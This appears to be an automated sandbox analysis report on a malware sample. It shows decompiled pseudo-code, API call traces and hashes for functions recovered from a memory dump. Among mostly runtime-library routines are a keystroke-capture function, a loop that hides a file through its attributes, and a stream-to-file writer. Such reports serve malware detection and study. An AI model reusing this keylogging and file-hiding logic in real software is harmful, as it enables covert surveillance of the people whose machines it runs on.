			E105D545D(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_v8 =  *0x46a00c ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E105D1047(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E105C0B89(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E105C1A0E(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E105D34EE(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E105C1A0E(_t101);
									goto L36;
								}
								_t62 = E105D34EE(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E105C1A0E(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E105D07FA(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E105E167E();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E105D34EE(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E105D07FA(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E105E167E();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x105d5462
0x105d5463
0x105d546b
0x105d546f
0x105d5470
0x105d5476
0x105d547c
0x105d5482
0x105d5485
0x105d5485
0x105d5488
0x105d548a
0x105d548a
0x105d5488
0x105d548c
0x105d5491
0x105d5498
0x105d549b
0x105d549b
0x105d54b7
0x105d54bd
0x105d54c2
0x105d5655
0x105d5668
0x105d54c8
0x105d54c8
0x105d54cb
0x105d54d0
0x105d54d4
0x105d5528
0x105d5528
0x105d552a
0x105d552c
0x105d564a
0x105d564a
0x105d564c
0x105d564d
0x00000000
0x105d5653
0x105d553d
0x105d5543
0x105d5545
0x00000000
0x00000000
0x105d554b
0x105d555d
0x105d5562
0x105d5566
0x00000000
0x00000000
0x105d5573
0x105d55ad
0x105d55b0
0x105d55b3
0x105d55b5
0x105d55b7
0x105d55b9
0x105d5605
0x105d5605
0x105d5607
0x105d5607
0x105d5609
0x105d5643
0x105d5644
0x00000000
0x105d5649
0x105d561d
0x105d5622
0x105d5624
0x00000000
0x00000000
0x105d5628
0x105d5629
0x105d562a
0x105d562d
0x105d5669
0x105d566c
0x105d562f
0x105d562f
0x105d5630
0x105d5630
0x105d563d
0x105d563f
0x105d5641
0x105d5672
0x00000000
0x00000000
0x00000000
0x00000000
0x105d5641
0x105d55bb
0x105d55be
0x105d55c0
0x105d55c2
0x105d55c4
0x105d55c7
0x105d55cc
0x105d55e7
0x105d55e9
0x105d55f3
0x105d55f5
0x105d55f6
0x105d55f8
0x00000000
0x00000000
0x105d55fa
0x105d5600
0x105d5600
0x00000000
0x105d5600
0x105d55ce
0x105d55d0
0x105d55d4
0x105d55d9
0x105d55db
0x105d55dd
0x00000000
0x00000000
0x105d55df
0x00000000
0x105d55df
0x105d5575
0x105d557a
0x00000000
0x00000000
0x105d5580
0x105d5582
0x00000000
0x00000000
0x105d5599
0x105d559e
0x105d55a2
0x00000000
0x00000000
0x00000000
0x105d55a8
0x105d54db
0x105d54dd
0x105d54df
0x105d54e7
0x105d5506
0x105d5508
0x105d5512
0x105d5514
0x105d5515
0x105d5517
0x00000000
0x00000000
0x105d551d
0x105d5523
0x105d5523
0x00000000
0x105d5523
0x105d54eb
0x105d54ef
0x105d54f4
0x105d54f8
0x00000000
0x00000000
0x105d54fe
0x00000000
0x105d54fe

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,105D56AE,00000001,00000001,00000006), ref: 105D54B7
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,?,?,?,105D56AE,00000001,00000001,00000006), ref: 105D553D
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,0000003B,00000006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 105D5637
__freea.LIBCMT ref: 105D5644

Part of subcall function 105D07FA: RtlAllocateHeap.NTDLL(00000000,?), ref: 105D082C

__freea.LIBCMT ref: 105D564D
__freea.LIBCMT ref: 105D5672

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 3c8ec32485a0275f0767097eae71f19e74435e9b155a0997f345ceccae632116
Instruction ID: b79e9539ac9b169d89d2ef457e4d81f14bee8f6857640bb2574b1115277b1218
Opcode Fuzzy Hash: 3c8ec32485a0275f0767097eae71f19e74435e9b155a0997f345ceccae632116
Instruction Fuzzy Hash: 4E51C872600316AFDB168F68CC45EAF7FAAEB84698F55462AFD05D7240EB34EC80C750

Uniqueness

Uniqueness Score: -1.00%

Function 0043F14E, Relevance: 9.2, APIs: 6, Instructions: 200COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0043F17A
__cftoe.LIBCMT ref: 0043F1AC

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: c2a31f394107e0f3225fa1d7b5013d3964004684340a0b5a6b4c6d0f9cd202bf
Instruction ID: bcbe42ceaebb365c1ac6e2a5e9ed457d7b54482c9f0ea6a0937b1c10150bb98b
Opcode Fuzzy Hash: c2a31f394107e0f3225fa1d7b5013d3964004684340a0b5a6b4c6d0f9cd202bf
Instruction Fuzzy Hash: E451E432D00205EADF249B69DC41BAF77A8AF4D324F60527FF91592282DB3DDD048A6C

Uniqueness

Uniqueness Score: -1.00%

Function 10599ADF, Relevance: 9.2, APIs: 6, Instructions: 168
sleepCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E10599ADF(void* __ecx, char* __edx) {
				char _v1028;
				char _v1040;
				char _v1064;
				char _v1076;
				void* _v1080;
				void* _v1088;
				void* _v1092;
				char _v1100;
				char _v1124;
				void* _v1132;
				char _v1136;
				void* _v1152;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t34;
				char* _t36;
				void* _t38;
				int _t42;
				void* _t49;
				void* _t53;
				void* _t65;
				int _t66;
				void* _t68;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t83;
				signed int _t141;
				signed int _t142;
				void* _t143;
				void* _t144;
				signed int _t145;

				_t131 = __edx;
				_t142 = _t141 & 0xfffffff8;
				_t145 = _t142;
				_t143 = _t142 - 0x464;
				_t83 = __ecx;
				_t136 = __ecx + 4;
				do {
					Sleep(0x1388);
					E10599A2E(_t83, _t131);
					_t131 = 0x45f724;
					if(E10598352(_t145) != 0) {
						if(E1059AC23() == 0) {
							CreateDirectoryW(E10592D59(0x46c3c8), 0);
						}
						_t133 = _t83 + 0x60;
						_t34 = GetFileAttributesW(E10592D59(_t83 + 0x60));
						_t148 = _t34 & 0x00000002;
						if((_t34 & 0x00000002) != 0) {
							SetFileAttributesW(E10592D59(_t133), 0x80);
						}
						_t36 = E10592E03(E10592CB7(0x46c578, _t131, _t148, 0x12));
						_t149 =  *_t36;
						if( *_t36 != 0) {
							E10592F43(_t83,  &_v1124);
							_t38 = E105932F7();
							E105968EA( &_v1028, E10592E03(0x46c560), _t38);
							_t42 = PathFileExistsW(E10592D59(_t133));
							__eflags = _t42;
							if(_t42 != 0) {
								E10592F43(_t83,  &_v1100);
								_t65 = E10592D59(_t133);
								_t131 =  &_v1100;
								_t66 = E105A884A(_t65,  &_v1100);
								__eflags = _t66;
								if(_t66 != 0) {
									_t68 = E105932F7();
									E10592E3F( &_v1136,  &_v1100, _t136, E10596A12(_t83,  &_v1028,  &_v1100,  &_v1076, E10592E03( &_v1100), _t68));
									E10592E35();
								}
								E10592E35();
							}
							__eflags = E105932F7() + _t43;
							E105942A4(E10592F19(_t83,  &_v1076, _t131, __eflags, E10592D59(_t136), E105932F7() + _t43));
							E10592E35();
							_t49 = E105932F7();
							E10596A12(_t83,  &_v1040, _t131,  &_v1064, E10592E03( &_v1136), _t49);
							_t53 = E10592D59(_t133);
							_t144 = _t143 - 0x18;
							E10592F5A(_t83, _t144, _t131, __eflags,  &_v1076);
							E105A88BC(_t53);
							_t143 = _t144 + 0x18;
							E10592E35();
							E10592E35();
						} else {
							_t74 = E10592D59(_t133);
							_t75 = E105932F7();
							_t76 = E10592D59(_t83 + 4);
							_t131 = _t75 + _t75;
							E105A87B5(_t76, _t75 + _t75, _t74, 1);
						}
						_t136 = _t83 + 4;
						E1059AC37(_t83, _t83 + 4, 0x45f724);
						if( *((char*)(E10592E03(E10592CB7(0x46c578, _t131, _t149, 0x13)))) != 0) {
							SetFileAttributesW(E10592D59(_t133), 6);
						}
					}
				} while ( *((char*)(_t83 + 0x49)) != 0);
				return 0;
			}

0x10599adf
0x10599ae2
0x10599ae2
0x10599ae5
0x10599aec
0x10599af0
0x10599af3
0x10599af8
0x10599b00
0x10599b05
0x10599b13
0x10599b25
0x10599b34
0x10599b34
0x10599b3a
0x10599b45
0x10599b4b
0x10599b4d
0x10599b5c
0x10599b5c
0x10599b70
0x10599b75
0x10599b78
0x10599bab
0x10599bb5
0x10599bca
0x10599bd7
0x10599bdd
0x10599bdf
0x10599be5
0x10599bec
0x10599bf1
0x10599bf7
0x10599bfc
0x10599bfe
0x10599c04
0x10599c27
0x10599c30
0x10599c30
0x10599c39
0x10599c39
0x10599c45
0x10599c5e
0x10599c67
0x10599c70
0x10599c89
0x10599c90
0x10599c95
0x10599ca1
0x10599ca8
0x10599cad
0x10599cb4
0x10599cbd
0x10599b7a
0x10599b7e
0x10599b86
0x10599b92
0x10599b97
0x10599b9b
0x10599ba1
0x10599cc2
0x10599ccc
0x10599ce7
0x10599cf3
0x10599cf3
0x10599ce7
0x10599cf9
0x10599d0b

APIs

Sleep.KERNEL32(00001388), ref: 10599AF8

Part of subcall function 10599A2E: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,10599B05), ref: 10599A64
Part of subcall function 10599A2E: GetFileSize.KERNEL32(00000000,00000000,?,?,?,10599B05), ref: 10599A73
Part of subcall function 10599A2E: Sleep.KERNEL32(00002710,?,?,?,10599B05), ref: 10599AA0
Part of subcall function 10599A2E: CloseHandle.KERNEL32(00000000,?,?,?,10599B05), ref: 10599AA7

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 10599B34
GetFileAttributesW.KERNEL32(00000000), ref: 10599B45
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 10599B5C
PathFileExistsW.SHLWAPI(00000000,00000012), ref: 10599BD7

Part of subcall function 105A884A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,1059509E,0045F464), ref: 105A8867

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,0045F724), ref: 10599CF3

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID:
API String ID: 3795512280-0
Opcode ID: ec40b544cd92aa40a1b15dafda3dccade50f70e30e262d14fe86580c325395a5
Instruction ID: a45d6460d2fd3fc4e9bc83d64ef3fbdb7e04d608cf13f54ff670fcc496140298
Opcode Fuzzy Hash: ec40b544cd92aa40a1b15dafda3dccade50f70e30e262d14fe86580c325395a5
Instruction Fuzzy Hash: 3251837960434057CB05EB74DC9EABE3FA9DFC4281F00452DF542A72A1EF64BE0AC692

Uniqueness

Uniqueness Score: -1.00%

Function 00408C71, Relevance: 9.2, APIs: 6, Instructions: 168sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 00408C8A

Part of subcall function 00408BC0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00408C97), ref: 00408BF6
Part of subcall function 00408BC0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00408C97), ref: 00408C05
Part of subcall function 00408BC0: Sleep.KERNEL32(00002710,?,?,?,00408C97), ref: 00408C32
Part of subcall function 00408BC0: CloseHandle.KERNEL32(00000000,?,?,?,00408C97), ref: 00408C39

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00408CC6
GetFileAttributesW.KERNEL32(00000000), ref: 00408CD7
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00408CEE
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00408D69

Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,0045F724), ref: 00408E85

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID:
API String ID: 3795512280-0
Opcode ID: 0962b7d6c290ae9142c192150177b04b3df9fc57785135a5f54016b418bc04ce
Instruction ID: 4984a4f95f6a53c2b7ea6b9f230a8855ca3d030a8821f40474633e04f56c7365
Opcode Fuzzy Hash: 0962b7d6c290ae9142c192150177b04b3df9fc57785135a5f54016b418bc04ce
Instruction Fuzzy Hash: E351A3716043015BCB15FB62C9A69BF76A59F80308F04053FF942BB2E2DF7C9905869E

Uniqueness

Uniqueness Score: -1.00%

Function 00440FE4, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 004410EC
__freea.LIBCMT ref: 00441196
__freea.LIBCMT ref: 004411B4

Part of subcall function 00430BA0: _free.LIBCMT ref: 00430BB6

Strings

am/pm, xrefs: 00441217
a/p, xrefs: 0044127B

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: __freea$__alloca_probe_16_free
String ID: a/p$am/pm
API String ID: 2936374016-3206640213
Opcode ID: d16504e75e0ea2757e68c923e6282fa821fc490f12299e6b2ab470a9fc324eef
Instruction ID: abbd8f6561c5a4b1d903009bec5ef9fca0809964487b93dc44758b3fc4038faa
Opcode Fuzzy Hash: d16504e75e0ea2757e68c923e6282fa821fc490f12299e6b2ab470a9fc324eef
Instruction Fuzzy Hash: DAD1E0319102168AFB248F68C8957BBB7B0FF05704F24415BEA01AB7A1D77D9DC1CB99

Uniqueness

Uniqueness Score: -1.00%

Function 10597146, Relevance: 9.1, APIs: 6, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E10597146(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				void* _v20;
				long _v24;
				char _v48;
				char _v72;
				void _v100076;
				void* __ebx;
				void* _t37;
				WCHAR* _t39;
				long _t46;
				struct _OVERLAPPED* _t58;
				intOrPtr _t77;
				long _t81;
				void* _t82;
				void* _t84;
				void* _t87;

				E105E1B9E();
				_t74 =  &_a12;
				asm("xorps xmm0, xmm0");
				_v16 = __ecx;
				_t58 = 0;
				asm("movlpd [ebp-0x8], xmm0");
				_v24 = 0;
				E10594188(0,  &_v48, __eflags, E10598382( &_v72,  &_a12, __eflags, 0x45f804));
				E10592D5E();
				_t37 = CreateFileW(E10592D59( &_v48), 4, 0, 0, 2, 0x80, 0);
				_v20 = _t37;
				_t84 = _v8 - _a8;
				if(_t84 > 0) {
					L8:
					CloseHandle(_t37);
					_t39 = E10592D59( &_a12);
					MoveFileW(E10592D59( &_v48), _t39);
					_t58 = 1;
				} else {
					_t77 = _a4;
					if(_t84 < 0) {
						goto L3;
					} else {
						_t85 = _v12 - _t77;
						if(_v12 >= _t77) {
							goto L8;
						} else {
							while(1) {
								L3:
								_t46 = E105959C8( &_v100076, 0x186a0);
								_t81 = _t46;
								asm("cdq");
								_v12 = _v12 + _t46;
								asm("adc [ebp-0x4], edx");
								WriteFile(_v20,  &_v100076, _t81,  &_v24, _t58);
								_t82 = _t82 - 0x18;
								E10592F19(_t58, _t82, _t74, _t85,  &_v12, 8);
								E10595912(_t58, _v16, _t74, _t85, 0x57, _v16);
								if(_t81 <= 0) {
									break;
								}
								_t87 = _v8 - _a8;
								if(_t87 < 0 || _t87 <= 0 && _v12 < _t77) {
									continue;
								} else {
									_t37 = _v20;
									goto L8;
								}
								goto L9;
							}
							CloseHandle(_v20);
							DeleteFileW(E10592D59( &_v48));
						}
					}
				}
				L9:
				E10592D5E();
				E10592D5E();
				return _t58;
			}

0x1059714e
0x10597157
0x1059715b
0x1059715e
0x10597161
0x10597163
0x10597170
0x1059717d
0x10597185
0x1059719f
0x105971a8
0x105971ab
0x105971ae
0x10597220
0x10597221
0x1059722a
0x10597239
0x1059723f
0x105971b0
0x105971b0
0x105971b3
0x00000000
0x105971b5
0x105971b5
0x105971b8
0x00000000
0x105971ba
0x105971ba
0x105971ba
0x105971c9
0x105971ce
0x105971d0
0x105971d1
0x105971d8
0x105971e7
0x105971ed
0x105971f8
0x10597202
0x10597209
0x00000000
0x00000000
0x10597211
0x10597214
0x00000000
0x1059721d
0x1059721d
0x00000000
0x1059721d
0x00000000
0x10597214
0x1059725d
0x1059726c
0x1059726c
0x105971b8
0x105971b3
0x10597241
0x10597244
0x1059724c
0x10597259

APIs

Part of subcall function 10598382: char_traits.LIBCPMT ref: 1059839D

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 1059719F
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 105971E7
CloseHandle.KERNEL32(00000000), ref: 10597221
MoveFileW.KERNEL32(00000000,00000000), ref: 10597239
CloseHandle.KERNEL32(?,00000057,?,00000008), ref: 1059725D
DeleteFileW.KERNEL32(00000000), ref: 1059726C

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
String ID:
API String ID: 820096542-0
Opcode ID: 94e1ed73948aee9412b70439699e1e5d8675887010475d2233f4173c9dc75780
Instruction ID: 1f8cd8ec41595eeda5a0ce22dc3dddeaabe2ed43d2631e46924c7190be509a0f
Opcode Fuzzy Hash: 94e1ed73948aee9412b70439699e1e5d8675887010475d2233f4173c9dc75780
Instruction Fuzzy Hash: F8313D79D0021CABDF04DFA4DC4ADEEBB79FB84251F10856AF511B3150DB70AA49CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10599828, Relevance: 9.1, APIs: 6, Instructions: 54
keyboardthreadCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E10599828(void* __ecx, intOrPtr _a4) {
				long _v8;
				void _v38;
				short _v40;
				char _v296;
				void* __ebx;
				void* __edi;
				struct HKL__* _t20;
				void* _t30;
				signed int _t32;
				void* _t36;

				_t30 = __ecx;
				E105C2D6E(_t36,  &_v296, 0, 0x100);
				_v40 = 0;
				_t32 = 7;
				memset( &_v38, 0, _t32 << 2);
				asm("stosw");
				_t20 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(),  &_v8));
				GetKeyState(0x10);
				GetKeyboardState( &_v296);
				_t9 = _t30 + 0x50; // 0x67006e
				_t10 = _t30 + 0x4c; // 0x69006c
				ToUnicodeEx( *_t10,  *_t9,  &_v296,  &_v40, 0x10, 0, _t20);
				E105950ED(_t30, _a4,  &_v40);
				return _a4;
			}

0x1059983f
0x10599844
0x10599851
0x10599857
0x10599858
0x1059985a
0x1059986e
0x10599878
0x10599885
0x1059989b
0x1059989e
0x105998a1
0x105998ae
0x105998bc

APIs

GetForegroundWindow.USER32(0046BAF0,?,0046BAF0), ref: 1059985C
GetWindowThreadProcessId.USER32(00000000,?), ref: 10599867
GetKeyboardLayout.USER32(00000000), ref: 1059986E
GetKeyState.USER32(00000010), ref: 10599878
GetKeyboardState.USER32(?), ref: 10599885
ToUnicodeEx.USER32(0069006C,0067006E,?,?,00000010,00000000,00000000), ref: 105998A1

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
String ID:
API String ID: 3566172867-0
Opcode ID: bb8a0652d06275aa5c9ec138a20de8bb22a08cf53d6cac7f88a299b2aee8fae5
Instruction ID: bb1f6807f0dde55fedd9879af387729e9442e814606f0d1918d12d545802bf8c
Opcode Fuzzy Hash: bb8a0652d06275aa5c9ec138a20de8bb22a08cf53d6cac7f88a299b2aee8fae5
Instruction Fuzzy Hash: 12110C72900208BBDB109FA4DC49FEA7BACEB48742F100465FA05E6191EA75EA54CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 105D2B50, Relevance: 9.0, APIs: 6, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E105D2B50(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x46a1e0;
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E105D01B6(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E105D314D(_t25, _t36, __eflags,  *0x46a1e0, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E105D29C2(_t25, _t31, 0x46b654);
							E105D1063(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E105D1063();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E105D07B7(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x46a1e0;
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E105D01B6(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E105D314D(_t27, _t37, __eflags,  *0x46a1e0, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E105D29C2(_t27, _t32, 0x46b654);
									E105D1063(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E105D1063();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E105D30F7(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E105D30F7(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x105d2b50
0x105d2b50
0x105d2b50
0x105d2b5a
0x105d2b5c
0x105d2b61
0x105d2b64
0x105d2b72
0x105d2b79
0x105d2b7e
0x105d2b81
0x105d2b84
0x105d2b96
0x105d2b9b
0x105d2b9d
0x105d2ba8
0x105d2baf
0x105d2bb4
0x105d2bb7
0x105d2bb9
0x00000000
0x00000000
0x00000000
0x00000000
0x105d2b9f
0x105d2b9f
0x00000000
0x105d2b9f
0x105d2b86
0x105d2b86
0x105d2b87
0x105d2b87
0x105d2b8c
0x105d2bc7
0x105d2bc8
0x105d2bce
0x105d2bd3
0x105d2bd6
0x105d2bd7
0x105d2bd8
0x105d2bdf
0x105d2be1
0x105d2be3
0x105d2be8
0x105d2beb
0x105d2bf9
0x105d2c05
0x105d2c08
0x105d2c0b
0x105d2c1d
0x105d2c22
0x105d2c24
0x105d2c2f
0x105d2c35
0x105d2c3d
0x105d2c3f
0x00000000
0x00000000
0x00000000
0x00000000
0x105d2c26
0x105d2c26
0x00000000
0x105d2c26
0x105d2c0d
0x105d2c0d
0x105d2c0e
0x105d2c0e
0x105d2c41
0x105d2c42
0x105d2c42
0x105d2bed
0x105d2bf3
0x105d2bf7
0x105d2c4a
0x105d2c4b
0x105d2c51
0x00000000
0x00000000
0x00000000
0x105d2bf7
0x105d2c58
0x105d2c58
0x105d2b66
0x105d2b6c
0x105d2b70
0x105d2bbb
0x105d2bbc
0x105d2bc6
0x00000000
0x00000000
0x00000000
0x105d2b70

APIs

GetLastError.KERNEL32(?,105CA311,105C63B3,105CA311,0046DBA0,?,105C81F5,FF8BC35D,0046DBA0,?), ref: 105D2B54
_free.LIBCMT ref: 105D2B87
_free.LIBCMT ref: 105D2BAF
SetLastError.KERNEL32(00000000,FF8BC35D,0046DBA0,?), ref: 105D2BBC
SetLastError.KERNEL32(00000000,FF8BC35D,0046DBA0,?), ref: 105D2BC8
_abort.LIBCMT ref: 105D2BCE

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 0de6c08e57926f0d0e854cb5354d82f98d4efa16c4461831838b1a0959fbb3f6
Instruction ID: 589e8d4016ec4c088088c04f3607f6fb0c5db9ec18d4a0b87075a085e6400574
Opcode Fuzzy Hash: 0de6c08e57926f0d0e854cb5354d82f98d4efa16c4461831838b1a0959fbb3f6
Instruction Fuzzy Hash: E5F0F93914174267D2016B3CAC0DE1B2F19DBE1AF2F214127F418D2391EFA0DD015766

Uniqueness

Uniqueness Score: -1.00%

